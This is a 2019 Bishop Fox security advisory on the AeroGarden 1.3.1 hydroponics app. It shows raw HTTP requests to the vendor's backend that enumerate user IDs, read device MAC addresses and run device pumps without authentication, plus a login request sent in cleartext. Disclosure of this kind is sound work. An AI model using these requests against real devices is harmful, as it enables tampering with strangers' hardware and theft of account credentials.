AeroGarden Version 1.3.1 - Multiple Vulnerabilities

Bishop Fox high risk vulnerabilities security advisory

Share

ADVISORY SUMMARY

AeroGrow International is a company that produces consumer hydroponic growing
hardware for plants (e.g., herbs, vegetables, and flowers). The hardware product can be
controlled with a mobile application for specific models of their hydroponic growing kits.
The project’s official website is http://www.aerogarden.com. The latest version of the
mobile application is 1.3.1.

Impact

Both identified vulnerabilities would be detrimental to AeroGarden users; an attacker could cause the devices to inflict damage to plant life or an attacker could capture traffic to access users’ account information.

Risk Level

Medium and High

Affected Vendor

Product Vendor

Product Name

Affected Version

AeroGrow International AeroGarden 1.3.1

Vulnerabilities List:

Solution

Incorrect Access Controls: Implement proper access controls for user actions throughout the application.

Insecure Network Transmission: Enforce the use of secure channels for data transmission.

Credits

Jason Gay, Security Associate, Bishop Fox - jgay@bishopfox.com

Timeline

  1. 02/20/2019: Initial discovery
  2. 03/21/2019: First attempt to contact vendor
  3. 04/17/2019: First contact with vendor
  4. 07/30/2019: Public Disclosure

VULNERABILITIES

Incorrect Access Controls

This version of the AeroGarden application is affected by incorrect access controls. Any user can request information about other users’ Wi-Fi-enabled AeroGarden hardware products, and then use this information to change settings (such as water pump run time, light settings, and vacation mode settings). The vulnerability can be exploited by any remote user without authentication.

CVE ID

Security Risk

Impact

Access Vector

N/A Medium Incorrect Access Control Remote

Further Details

  • CVSS Base Score: 5.3
  • CVSS Vector: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L

By observing the communication between the mobile application and the Amazon EC2 back end, the testing team revealed that the requests to execute commands on the AeroGarden hardware only required the MAC address (airGuid) of the hardware and the numerical user ID (userID) associated with that hardware. The testing team obtained this information by issuing the following request:

Request
POST /api/Custom/QueryUserDevice HTTP/1.1
Host: ec2-54-86-39-88.compute-1.amazonaws.com:8080
Content-Type: application/x-www-form-urlencoded
Connection: close
Accept: */*
User-Agent: BountyWiFi/1.3.1 (iPhone; iOS 12.1.4; Scale/3.00)
Accept-Language: en-US;q=1
Content-Length: 12
Accept-Encoding: gzip, deflate

userID=[REDACTED]

The response returned the following information:

Response
{"configID":[REDACTED],"airGuid":[REDACTED],"lightCycle":"08000100","pumpCycle":"00050037","lightTemp":1,"lightStat":1,"clock":"160503","pumpStat":0,"pumpHydro":0,"pumpTest":1,"pumpDrain":null,"pumpDrainState":null,"pumpLevel":0,"pumpRemind4Hour":0,"gardenType":2,"plantedType":0,"plantedName":"S2l0Y2hlbg==","totalDay":120,"plantedDay":47,"nutriCycle":14,"nutriRemindDay":12,"nutriStatus":0,"alarmAllow":0,"plantedDate":"d2:40:d0:55:94:89","nutrientDate":[REDACTED]","updateDate":"2019-02-22T02:28:31","createDate":null,"swVersion":"MFW-V0.20","hwVersion":"SW-V1.18","bwVersion":"HW-V3.0","oldPlantedDay":47,"deviceID":"[REDACTED]","deviceIP":"[REDACTED]","chooseGarden":0,"oldlightCycle":null,"vacationMode":0,"bwConnectedSsid":null,"nutriStatusFlag":"0","nutriStatusDate":"0001-01-01T00:00:00","remark":null,"imgUrl":null,"timezone":"0","audioAlarmStat":0,"audioAlarmCycleSet":0,"audioAlarmCycle":null}]

By iterating through the possible 5-digit combos for the userID during testing, the team could retrieve the MAC address (airGuid) of various units not under their control. Only these two pieces of information were necessary to issue commands to the hardware.

With this information, an attacker could issue the following command to turn on the water pump for one minute:

POST /api/Custom/UpdateDeviceConfig HTTP/1.1
Host: ec2-54-86-39-88.compute-1.amazonaws.com:8080
Content-Type: application/x-www-form-urlencoded
Connection: close
Accept: */*
User-Agent: BountyWiFi/1.3.1 (iPhone; iOS 12.1.4; Scale/3.00)
Accept-Language: en-US;q=1
Content-Length: 118
Accept-Encoding: gzip, deflate

airGuid=[REDACTED]&chooseGarden=0&plantConfig=%7B%0A%20%20%22pumpTest%22%20%3A%201%0A%7D&userID=[REDACTED]

It was confirmed that the unit then ran its pump for one minute. By reviewing different options within the mobile application, different commands could also be issued to alter the light cycle, set vacation mode, or return the devices to their default settings. An attacker could make the motor run until damaged or change options and timing to damage plant life in the system.

No authentication was required for exploitation.

Insecure Network Transmission

The AeroGarden application transmits not only request for command execution in cleartext but also login credentials for the user's account.

CVE ID

Security Risk

Impact

Access Vector

N/A High Information Disclosure Remote

Further Details

  • CVSS Base Score: 9.1
  • CVSS Vector: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N

As shown with the Incorrect Access Control issue in this application, network communication between the mobile application and the Amazon EC2 instance occurs over insecure HTTP channels. During testing, insecure transmission of login information from the application was observed, as shown below:

POST /api/Admin/Login HTTP/1.1
Host: ec2-54-86-39-88.compute-1.amazonaws.com:8080
Content-Type: application/x-www-form-urlencoded
Connection: close
Accept: */*
User-Agent: BountyWiFi/1.3.1 (iPhone; iOS 12.1.4; Scale/3.00)
Accept-Language: en-US;q=1
Content-Length: 61
Accept-Encoding: gzip, deflate

mail=[REDACTED]&userPwd=[REDACTED]

If an attacker were able to capture this traffic, they could access a user’s account on the AeroGarden website, where they could access personal information (such as address and payment information), depending on whether the user has saved this information to the site or not.


Default fox headshot blue

About the author, Jason Gay

Senior Security Consultant

Jason Gay (CISSP, OSCP, CEH) is a Senior Security Consultant at Bishop Fox, where he focuses on product security reviews, mobile and web application penetration testing, network penetration testing, and social engineering.

Jason has been a dedicated member of the cybersecurity community for most of his life. He has contributed to numerous CVEs as a mentor, given talks ranging from "Lock Picking 101" to "Wireless Hacking with UAVs", and has created training material for businesses large and small. He has also worked closely with the Armed Forces Communications and Electronics Association (AFCEA), and he operates his local DEF CON 318 (DC318) group. Jason's research currently focuses on the Internet of Things (IoT), including Bluetooth locks and other smart home gadgets. He recently disclosed a high-risk issue in a mobile application that could be used to take over a hardware appliance for regulating plant life.

More by Jason

This site uses cookies to provide you with a great user experience. By continuing to use our website, you consent to the use of cookies. To find out more about the cookies we use, please see our Privacy Policy.